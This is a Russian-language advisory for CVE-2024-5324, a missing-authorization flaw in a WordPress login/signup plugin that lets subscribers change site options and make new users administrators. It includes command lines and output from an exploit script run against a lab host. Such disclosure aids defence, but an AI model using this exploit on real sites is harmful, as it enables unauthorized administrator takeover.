
Всплывающее окно входа/регистрации ( Встроенная форма + Woocommerce ) 2.7.1 - 2.7.2 - Отсутствие авторизации для произвольного обновления параметров
Всплывающее окно входа/регистрации (Inline Form + Woocommerce) 2.7.1 – 2.7.2 – Отсутствие авторизации для произвольного обновления опций
Плагин Login/Signup Popup (Inline Form + Woocommerce) для WordPress уязвим к несанкционированному изменению данных из-за отсутствия проверки прав доступа в функции import_settings в версиях с 2.7.1 по 2.7.2. Это позволяет аутентифицированным злоумышленникам, имеющим как минимум уровень подписчика, изменять произвольные опции на затронутых сайтах. Это может использоваться для включения регистрации новых пользователей и установки роли по умолчанию для новых пользователей как администратор.
Severity: high
CVE ID: CVE-2024-5324
CVSS Score: 8.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: easy-login-woocommerce
WPScan URL: https://www.wpscan.com/plugin/easy-login-woocommerce
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=api-prod
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
You can now register a user on the as a admin.
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test --fix e
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Options reset to default